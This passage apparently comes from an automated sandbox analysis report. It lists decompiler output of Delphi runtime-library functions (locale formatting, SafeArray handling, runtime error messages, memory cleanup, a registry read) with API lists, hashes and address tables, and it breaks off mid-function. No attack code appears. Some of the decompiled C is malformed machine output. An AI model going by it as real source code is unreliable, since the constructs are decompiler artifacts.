                                                                                                            APIs
                                                                                                            • GetThreadLocale.KERNEL32(00000000,5048B9BF,?,?,00000000,00000000), ref: 5048B72A
                                                                                                              • Part of subcall function 50489FC8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 50489FE6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: Locale$InfoThread
                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                            • API String ID: 4232894706-2493093252
                                                                                                            • Opcode ID: a78e8ff37736d593ccb97a8e7a9625d36eba4b3fbfc8572ae1034af5f096c93a
                                                                                                            • Instruction ID: 0678bb598d25897572201eb440f8703e48415cdcb47683ddd45e72acc41258fb
                                                                                                            • Opcode Fuzzy Hash: a78e8ff37736d593ccb97a8e7a9625d36eba4b3fbfc8572ae1034af5f096c93a
                                                                                                            • Instruction Fuzzy Hash: BA6170707011489FDB04DBE8D841ADE77A69FA8208F608F7AF601AB746DA3DDD069790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048DBCC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E5048DBCC(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				intOrPtr _v792;
				signed short* _v796;
				char _v800;
				char _v804;
				intOrPtr* _v808;
				void* __ebp;
				signed char _t51;
				signed int _t58;
				void* _t66;
				intOrPtr* _t78;
				intOrPtr* _t96;
				void* _t98;
				void* _t100;
				void* _t103;
				void* _t104;
				intOrPtr* _t114;
				void* _t118;
				char* _t119;
				void* _t120;

				_t105 = __ecx;
				_v780 = __ecx;
				_t96 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E5048D80C(0x80070057);
				}
				_t51 =  *_t96;
				if((_t51 & 0x00000fff) != 0xc) {
					_push(_t96);
					_push(_v776);
					L5048C5B4();
					return E5048D80C(_v776);
				} else {
					if((_t51 & 0x00000040) == 0) {
						_v796 =  *((intOrPtr*)(_t96 + 8));
					} else {
						_v796 =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 8))));
					}
					_v788 =  *_v796 & 0x0000ffff;
					_t98 = _v788 - 1;
					if(_t98 < 0) {
						L9:
						_push( &_v772);
						_t58 = _v788;
						_push(_t58);
						_push(0xc);
						L5048CA08();
						_v792 = _t58;
						if(_v792 == 0) {
							E5048D564(_t105);
						}
						E5048DB24(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _v792;
						_t100 = _v788 - 1;
						if(_t100 < 0) {
							L14:
							_t102 = _v788 - 1;
							if(E5048DB40(_v788 - 1, _t120) != 0) {
								L5048CA20();
								E5048D80C(_v796);
								L5048CA20();
								E5048D80C(_v792);
								_v780(_v792,  &_v260,  &_v804, _v796,  &_v260,  &_v800);
							}
							_t66 = E5048DB70(_t102, _t120);
						} else {
							_t103 = _t100 + 1;
							_t78 =  &_v768;
							_t114 =  &_v260;
							do {
								 *_t114 =  *_t78;
								_t114 = _t114 + 4;
								_t78 = _t78 + 8;
								_t103 = _t103 - 1;
							} while (_t103 != 0);
							do {
								goto L14;
							} while (_t66 != 0);
							return _t66;
						}
					} else {
						_t104 = _t98 + 1;
						_t118 = 0;
						_t119 =  &_v772;
						do {
							_v808 = _t119;
							_push(_v808 + 4);
							_t18 = _t118 + 1; // 0x1
							_push(_v796);
							L5048CA10();
							E5048D80C(_v796);
							_push( &_v784);
							_t21 = _t118 + 1; // 0x1
							_push(_v796);
							L5048CA18();
							E5048D80C(_v796);
							 *_v808 = _v784 -  *((intOrPtr*)(_v808 + 4)) + 1;
							_t118 = _t118 + 1;
							_t119 = _t119 + 8;
							_t104 = _t104 - 1;
						} while (_t104 != 0);
						goto L9;
					}
				}
			}





























                                                                                                            0x5048dbcc
                                                                                                            0x5048dbd8
                                                                                                            0x5048dbde
                                                                                                            0x5048dbe0
                                                                                                            0x5048dbea
                                                                                                            0x5048dbf1
                                                                                                            0x5048dbf1
                                                                                                            0x5048dbf6
                                                                                                            0x5048dc04
                                                                                                            0x5048dd92
                                                                                                            0x5048dd99
                                                                                                            0x5048dd9a
                                                                                                            0x00000000
                                                                                                            0x5048dc0a
                                                                                                            0x5048dc0d
                                                                                                            0x5048dc1f
                                                                                                            0x5048dc0f
                                                                                                            0x5048dc14
                                                                                                            0x5048dc14
                                                                                                            0x5048dc2e
                                                                                                            0x5048dc3a
                                                                                                            0x5048dc3d
                                                                                                            0x5048dcaa
                                                                                                            0x5048dcb0
                                                                                                            0x5048dcb1
                                                                                                            0x5048dcb7
                                                                                                            0x5048dcb8
                                                                                                            0x5048dcba
                                                                                                            0x5048dcbf
                                                                                                            0x5048dccc
                                                                                                            0x5048dcce
                                                                                                            0x5048dcce
                                                                                                            0x5048dcd9
                                                                                                            0x5048dce4
                                                                                                            0x5048dcf5
                                                                                                            0x5048dcfe
                                                                                                            0x5048dd01
                                                                                                            0x5048dd1d
                                                                                                            0x5048dd24
                                                                                                            0x5048dd2f
                                                                                                            0x5048dd46
                                                                                                            0x5048dd4b
                                                                                                            0x5048dd65
                                                                                                            0x5048dd6a
                                                                                                            0x5048dd7d
                                                                                                            0x5048dd7d
                                                                                                            0x5048dd86
                                                                                                            0x5048dd03
                                                                                                            0x5048dd03
                                                                                                            0x5048dd04
                                                                                                            0x5048dd0a
                                                                                                            0x5048dd10
                                                                                                            0x5048dd12
                                                                                                            0x5048dd14
                                                                                                            0x5048dd17
                                                                                                            0x5048dd1a
                                                                                                            0x5048dd1a
                                                                                                            0x5048dd1d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x5048dd1d
                                                                                                            0x5048dc3f
                                                                                                            0x5048dc3f
                                                                                                            0x5048dc40
                                                                                                            0x5048dc42
                                                                                                            0x5048dc48
                                                                                                            0x5048dc4a
                                                                                                            0x5048dc59
                                                                                                            0x5048dc5a
                                                                                                            0x5048dc64
                                                                                                            0x5048dc65
                                                                                                            0x5048dc6a
                                                                                                            0x5048dc75
                                                                                                            0x5048dc76
                                                                                                            0x5048dc80
                                                                                                            0x5048dc81
                                                                                                            0x5048dc86
                                                                                                            0x5048dca1
                                                                                                            0x5048dca3
                                                                                                            0x5048dca4
                                                                                                            0x5048dca7
                                                                                                            0x5048dca7
                                                                                                            0x00000000
                                                                                                            0x5048dc48
                                                                                                            0x5048dc3d

                                                                                                            APIs
                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 5048DC65
                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 5048DC81
                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 5048DCBA
                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 5048DD46
                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 5048DD65
                                                                                                            • VariantCopy.OLEAUT32(?), ref: 5048DD9A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 351091851-3916222277
                                                                                                            • Opcode ID: 5efa9071b0b2097668282d9b84f3a514625c73fe5375aa8cd1664ebc4d30b008
                                                                                                            • Instruction ID: 8dc7f0179d9e58a26bed2711a4dc85309eafadbb5c2d65b5dd75da89bb941208
                                                                                                            • Opcode Fuzzy Hash: 5efa9071b0b2097668282d9b84f3a514625c73fe5375aa8cd1664ebc4d30b008
                                                                                                            • Instruction Fuzzy Hash: 6751DE7590262D9BCB55EF98CC81BC9B3FCAF5C204F0046DAE509E7211D674AF858FA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 504840F4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E504840F4(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x50495044 == 0) {
					if( *0x50494030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x50495218 == 0xd7b2 &&  *0x50495220 > 0) {
						 *0x50495230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E5048417C, 2,  &_v4, 0);
				}
			}





                                                                                                            0x504840fc
                                                                                                            0x5048415c
                                                                                                            0x5048416c
                                                                                                            0x5048416c
                                                                                                            0x50484172
                                                                                                            0x504840fe
                                                                                                            0x50484107
                                                                                                            0x50484117
                                                                                                            0x50484117
                                                                                                            0x50484133
                                                                                                            0x50484154
                                                                                                            0x50484154

                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,504841BE,?,?,?,50495630,?,?,`_HP,50486015,50492F0A), ref: 5048412D
                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,504841BE,?,?,?,50495630,?,?,`_HP,50486015), ref: 50484133
                                                                                                            • GetStdHandle.KERNEL32(000000F5,5048417C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,504841BE,?,?,?), ref: 50484148
                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,5048417C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,504841BE), ref: 5048414E
                                                                                                            • MessageBoxA.USER32 ref: 5048416C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                            • Opcode ID: 216350ae95614e8bb23c7ed7b0abd5fb1b39848cb2683b4ce0607797c8c85fde
                                                                                                            • Instruction ID: 8b51c4049283800e1e7da91de68bf92016e01121f8577df025bcb2b2a1a59e04
                                                                                                            • Opcode Fuzzy Hash: 216350ae95614e8bb23c7ed7b0abd5fb1b39848cb2683b4ce0607797c8c85fde
                                                                                                            • Instruction Fuzzy Hash: A7F0B46155128439EB20A3E0AD0EF89251C9FB8F18F684F7FFB14581E5D77C54C497A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048A6CC, Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E5048A6CC(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				_t40 = __edx;
				E5048A534(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x504948e8; // 0x50495044
				if( *_t14 == 0) {
					_t16 =  *0x504947e8; // 0x504862d8
					_t9 = _t16 + 4; // 0xffe8
					_t18 =  *0x50495660; // 0x50480000
					LoadStringA(E5048516C(_t18,  &_v1024, _t40),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x5049480c; // 0x50495214
				E50482AE8(E50482F14(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E5048791C( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x5048a790, 2,  &_v1092, 0);
			}












                                                                                                            0x5048a6cc
                                                                                                            0x5048a6db
                                                                                                            0x5048a6e0
                                                                                                            0x5048a6e8
                                                                                                            0x5048a74f
                                                                                                            0x5048a754
                                                                                                            0x5048a758
                                                                                                            0x5048a763
                                                                                                            0x00000000
                                                                                                            0x5048a779
                                                                                                            0x5048a6ea
                                                                                                            0x5048a6f4
                                                                                                            0x5048a703
                                                                                                            0x5048a713
                                                                                                            0x5048a726
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                              • Part of subcall function 5048A534: VirtualQuery.KERNEL32(?,?,0000001C), ref: 5048A550
                                                                                                              • Part of subcall function 5048A534: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 5048A574
                                                                                                              • Part of subcall function 5048A534: GetModuleFileNameA.KERNEL32(50480000,?,00000105), ref: 5048A58F
                                                                                                              • Part of subcall function 5048A534: LoadStringA.USER32 ref: 5048A633
                                                                                                            • CharToOemA.USER32 ref: 5048A703
                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 5048A720
                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 5048A726
                                                                                                            • GetStdHandle.KERNEL32(000000F4,5048A790,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 5048A73B
                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,5048A790,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 5048A741
                                                                                                            • LoadStringA.USER32 ref: 5048A763
                                                                                                            • MessageBoxA.USER32 ref: 5048A779
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 185507032-0
                                                                                                            • Opcode ID: 4648274253026577b82f95499810acd953ecdb67d04082e56fcd4d2f964fadb8
                                                                                                            • Instruction ID: 462965e501b807b83abfa202369e46ed38ee172111dc2f7bde23a3acb7700153
                                                                                                            • Opcode Fuzzy Hash: 4648274253026577b82f95499810acd953ecdb67d04082e56fcd4d2f964fadb8
                                                                                                            • Instruction Fuzzy Hash: 64111FB65052046AE741DBD4CC46F8B77ECAF65604F800F2BB744D60A2DA78D94487A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50481C0C, Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E50481C0C() {
				void* _v8;
				intOrPtr* _v12;
				void* _t13;
				void* _t15;
				intOrPtr* _t18;
				void* _t31;
				void* _t37;
				intOrPtr _t42;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t44 = _t46;
				_t47 = _t46 + 0xfffffff8;
				if( *0x504955bc == 0) {
					return _t13;
				} else {
					_push(_t44);
					_push(E50481D00);
					_push( *[fs:eax]);
					 *[fs:eax] = _t47;
					if( *0x50495045 != 0) {
						_push(0x504955c4);
						L50481314();
					}
					 *0x504955bc = 0;
					_t15 =  *0x5049561c; // 0x81e6f0
					LocalFree(_t15);
					 *0x5049561c = 0;
					_t18 =  *0x504955e4; // 0x81fd24
					_v12 = _t18;
					while(0x504955e4 != _v12) {
						VirtualFree( *(_v12 + 8), 0, 0x8000);
						_v12 =  *_v12;
					}
					E504813B0(0x504955e4);
					E504813B0(0x504955f4);
					E504813B0(0x50495620);
					_t31 =  *0x504955dc; // 0x81f6f0
					_v8 = _t31;
					while(_v8 != 0) {
						 *0x504955dc =  *_v8;
						LocalFree(_v8);
						_t37 =  *0x504955dc; // 0x81f6f0
						_v8 = _t37;
					}
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(0x50481d07);
					if( *0x50495045 != 0) {
						_push(0x504955c4);
						L5048131C();
					}
					_push(0x504955c4);
					L50481324();
					return 0;
				}
			}














                                                                                                            0x50481c0d
                                                                                                            0x50481c0f
                                                                                                            0x50481c19
                                                                                                            0x50481d0a
                                                                                                            0x50481c1f
                                                                                                            0x50481c21
                                                                                                            0x50481c22
                                                                                                            0x50481c27
                                                                                                            0x50481c2a
                                                                                                            0x50481c34
                                                                                                            0x50481c36
                                                                                                            0x50481c3b
                                                                                                            0x50481c3b
                                                                                                            0x50481c40
                                                                                                            0x50481c47
                                                                                                            0x50481c4d
                                                                                                            0x50481c54
                                                                                                            0x50481c59
                                                                                                            0x50481c5e
                                                                                                            0x50481c7e
                                                                                                            0x50481c71
                                                                                                            0x50481c7b
                                                                                                            0x50481c7b
                                                                                                            0x50481c8d
                                                                                                            0x50481c97
                                                                                                            0x50481ca1
                                                                                                            0x50481ca6
                                                                                                            0x50481cab
                                                                                                            0x50481cb2
                                                                                                            0x50481cb9
                                                                                                            0x50481cc2
                                                                                                            0x50481cc7
                                                                                                            0x50481ccc
                                                                                                            0x50481ccf
                                                                                                            0x50481cd7
                                                                                                            0x50481cda
                                                                                                            0x50481cdd
                                                                                                            0x50481ce9
                                                                                                            0x50481ceb
                                                                                                            0x50481cf0
                                                                                                            0x50481cf0
                                                                                                            0x50481cf5
                                                                                                            0x50481cfa
                                                                                                            0x50481cff
                                                                                                            0x50481cff

                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.KERNEL32(504955C4,00000000,50481D00), ref: 50481C3B
                                                                                                            • LocalFree.KERNEL32(0081E6F0,00000000,50481D00), ref: 50481C4D
                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0081E6F0,00000000,50481D00), ref: 50481C71
                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00008000,0081E6F0,00000000,50481D00), ref: 50481CC2
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(504955C4,50481D07,0081E6F0,00000000,50481D00), ref: 50481CF0
                                                                                                            • RtlDeleteCriticalSection.KERNEL32(504955C4,50481D07,0081E6F0,00000000,50481D00), ref: 50481CFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3782394904-0
                                                                                                            • Opcode ID: dbd4b6a1e896ac349f6ef7aefba08c788ac8dd7907041a19600a95a81a419100
                                                                                                            • Instruction ID: d5de5bbafba0aa06e28123ff5d13d03f9c27caf6874fcb61936900debf945daf
                                                                                                            • Opcode Fuzzy Hash: dbd4b6a1e896ac349f6ef7aefba08c788ac8dd7907041a19600a95a81a419100
                                                                                                            • Instruction Fuzzy Hash: 81215A70905284AFE710DBA8D845B8DBBE8AF18224F254E7BE905DB3A1DB389D40DB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048A534, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E5048A534(intOrPtr* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v277;
				char _v538;
				char _v794;
				struct _MEMORY_BASIC_INFORMATION _v824;
				char _v828;
				intOrPtr _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				intOrPtr _v848;
				char _v852;
				char* _v856;
				char _v860;
				char _v864;
				char _v1120;
				void* __edi;
				struct HINSTANCE__* _t45;
				intOrPtr _t58;
				struct HINSTANCE__* _t60;
				void* _t78;
				intOrPtr* _t83;
				void* _t94;
				void* _t95;
				void* _t102;

				_t102 = __fp0;
				_t84 = __ecx;
				_t94 = __ecx;
				_t95 = __edx;
				_t83 = __eax;
				VirtualQuery(__edx,  &_v824, 0x1c);
				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
					_t45 =  *0x50495660; // 0x50480000
					GetModuleFileNameA(_t45,  &_v538, 0x105);
					_v16 = E5048A528(_t95);
				} else {
					_v16 = _t95 - _v824.AllocationBase;
				}
				E50487944( &_v277, 0x104, E5048B400( &_v538, _t84, 0x5c) + 1);
				_v8 = 0x5048a6c4;
				_v12 = 0x5048a6c4;
				_t91 =  *0x50486520; // 0x5048656c
				if(E50483884(_t83, _t91) != 0) {
					_v8 = E50484714( *((intOrPtr*)(_t83 + 4)));
					_t78 = E5048791C(_v8, _t94);
					if(_t78 != 0) {
						_t91 = _v8;
						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
							_v12 = 0x5048a6c8;
						}
					}
				}
				_t58 =  *0x5049494c; // 0x504862d0
				_t21 = _t58 + 4; // 0xffe7
				_t60 =  *0x50495660; // 0x50480000
				LoadStringA(E5048516C(_t60, 0x104, _t91),  *_t21,  &_v794, 0x100);
				E50483664( *_t83,  &_v1120);
				_v864 =  &_v1120;
				_v860 = 4;
				_v856 =  &_v277;
				_v852 = 6;
				_v848 = _v16;
				_v844 = 5;
				_v840 = _v8;
				_v836 = 6;
				_v832 = _v12;
				_v828 = 6;
				E50487E78(_t94, _a4, _t102, 4,  &_v864);
				return E5048791C(_t94, _t94);
			}






























                                                                                                            0x5048a534
                                                                                                            0x5048a534
                                                                                                            0x5048a540
                                                                                                            0x5048a542
                                                                                                            0x5048a544
                                                                                                            0x5048a550
                                                                                                            0x5048a55f
                                                                                                            0x5048a589
                                                                                                            0x5048a58f
                                                                                                            0x5048a59b
                                                                                                            0x5048a5a0
                                                                                                            0x5048a5a6
                                                                                                            0x5048a5a6
                                                                                                            0x5048a5c4
                                                                                                            0x5048a5ce
                                                                                                            0x5048a5d6
                                                                                                            0x5048a5db
                                                                                                            0x5048a5e8
                                                                                                            0x5048a5f2
                                                                                                            0x5048a5f8
                                                                                                            0x5048a5ff
                                                                                                            0x5048a601
                                                                                                            0x5048a609
                                                                                                            0x5048a610
                                                                                                            0x5048a610
                                                                                                            0x5048a609
                                                                                                            0x5048a5ff
                                                                                                            0x5048a61f
                                                                                                            0x5048a624
                                                                                                            0x5048a628
                                                                                                            0x5048a633
                                                                                                            0x5048a640
                                                                                                            0x5048a64b
                                                                                                            0x5048a651
                                                                                                            0x5048a65e
                                                                                                            0x5048a664
                                                                                                            0x5048a66e
                                                                                                            0x5048a674
                                                                                                            0x5048a67e
                                                                                                            0x5048a684
                                                                                                            0x5048a68e
                                                                                                            0x5048a694
                                                                                                            0x5048a6af
                                                                                                            0x5048a6c1

                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 5048A550
                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 5048A574
                                                                                                            • GetModuleFileNameA.KERNEL32(50480000,?,00000105), ref: 5048A58F
                                                                                                            • LoadStringA.USER32 ref: 5048A633
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                            • String ID: leHP
                                                                                                            • API String ID: 3990497365-1298336405
                                                                                                            • Opcode ID: 5e66c23c95b5a693b71d80e1fae6b1c710c3ff56592d0d2c48e3f496fa404e30
                                                                                                            • Instruction ID: 4593b40b998b1fabb6f84644a9ea66ece3e1700e551803fb272d25766af99670
                                                                                                            • Opcode Fuzzy Hash: 5e66c23c95b5a693b71d80e1fae6b1c710c3ff56592d0d2c48e3f496fa404e30
                                                                                                            • Instruction Fuzzy Hash: A8416F71A012589FDB21CB98CC85BDEB7F8AF18204F4445EAE508E7251E7789F848F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048A532, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E5048A532(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v277;
				char _v538;
				char _v794;
				struct _MEMORY_BASIC_INFORMATION _v824;
				char _v828;
				intOrPtr _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				intOrPtr _v848;
				char _v852;
				char* _v856;
				char _v860;
				char _v864;
				char _v1120;
				void* __edi;
				struct HINSTANCE__* _t45;
				intOrPtr _t58;
				struct HINSTANCE__* _t60;
				void* _t78;
				intOrPtr* _t84;
				void* _t97;
				void* _t100;
				void* _t114;

				_t86 = __ecx;
				_t97 = __ecx;
				_t100 = __edx;
				_t84 = __eax;
				VirtualQuery(__edx,  &_v824, 0x1c);
				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
					_t45 =  *0x50495660; // 0x50480000
					GetModuleFileNameA(_t45,  &_v538, 0x105);
					_v16 = E5048A528(_t100);
				} else {
					_v16 = _t100 - _v824.AllocationBase;
				}
				E50487944( &_v277, 0x104, E5048B400( &_v538, _t86, 0x5c) + 1);
				_v8 = 0x5048a6c4;
				_v12 = 0x5048a6c4;
				_t93 =  *0x50486520; // 0x5048656c
				if(E50483884(_t84, _t93) != 0) {
					_v8 = E50484714( *((intOrPtr*)(_t84 + 4)));
					_t78 = E5048791C(_v8, _t97);
					if(_t78 != 0) {
						_t93 = _v8;
						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
							_v12 = 0x5048a6c8;
						}
					}
				}
				_t58 =  *0x5049494c; // 0x504862d0
				_t21 = _t58 + 4; // 0xffe7
				_t60 =  *0x50495660; // 0x50480000
				LoadStringA(E5048516C(_t60, 0x104, _t93),  *_t21,  &_v794, 0x100);
				E50483664( *_t84,  &_v1120);
				_v864 =  &_v1120;
				_v860 = 4;
				_v856 =  &_v277;
				_v852 = 6;
				_v848 = _v16;
				_v844 = 5;
				_v840 = _v8;
				_v836 = 6;
				_v832 = _v12;
				_v828 = 6;
				E50487E78(_t97, _a4, _t114, 4,  &_v864);
				return E5048791C(_t97, _t97);
			}






























                                                                                                            0x5048a532
                                                                                                            0x5048a540
                                                                                                            0x5048a542
                                                                                                            0x5048a544
                                                                                                            0x5048a550
                                                                                                            0x5048a55f
                                                                                                            0x5048a589
                                                                                                            0x5048a58f
                                                                                                            0x5048a59b
                                                                                                            0x5048a5a0
                                                                                                            0x5048a5a6
                                                                                                            0x5048a5a6
                                                                                                            0x5048a5c4
                                                                                                            0x5048a5ce
                                                                                                            0x5048a5d6
                                                                                                            0x5048a5db
                                                                                                            0x5048a5e8
                                                                                                            0x5048a5f2
                                                                                                            0x5048a5f8
                                                                                                            0x5048a5ff
                                                                                                            0x5048a601
                                                                                                            0x5048a609
                                                                                                            0x5048a610
                                                                                                            0x5048a610
                                                                                                            0x5048a609
                                                                                                            0x5048a5ff
                                                                                                            0x5048a61f
                                                                                                            0x5048a624
                                                                                                            0x5048a628
                                                                                                            0x5048a633
                                                                                                            0x5048a640
                                                                                                            0x5048a64b
                                                                                                            0x5048a651
                                                                                                            0x5048a65e
                                                                                                            0x5048a664
                                                                                                            0x5048a66e
                                                                                                            0x5048a674
                                                                                                            0x5048a67e
                                                                                                            0x5048a684
                                                                                                            0x5048a68e
                                                                                                            0x5048a694
                                                                                                            0x5048a6af
                                                                                                            0x5048a6c1

                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 5048A550
                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 5048A574
                                                                                                            • GetModuleFileNameA.KERNEL32(50480000,?,00000105), ref: 5048A58F
                                                                                                            • LoadStringA.USER32 ref: 5048A633
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                            • String ID: leHP
                                                                                                            • API String ID: 3990497365-1298336405
                                                                                                            • Opcode ID: 7404588b27425cdd4c6000d910d38659b7bb1f3f81f41c380838499ddf860c46
                                                                                                            • Instruction ID: c1f93f9d99f453ce67a17262bf240e02f1658768cf8e0b6f65d9e6104d57d1d7
                                                                                                            • Opcode Fuzzy Hash: 7404588b27425cdd4c6000d910d38659b7bb1f3f81f41c380838499ddf860c46
                                                                                                            • Instruction Fuzzy Hash: 6E416071A012589FDB61CB98CC85BDEB7F8AF18204F4445EAE508E7351E7B89F848F91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50483588, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E50483588() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x50494024 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x50494024; // 0x27f
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x50494024 = _t14;
					return _t14;
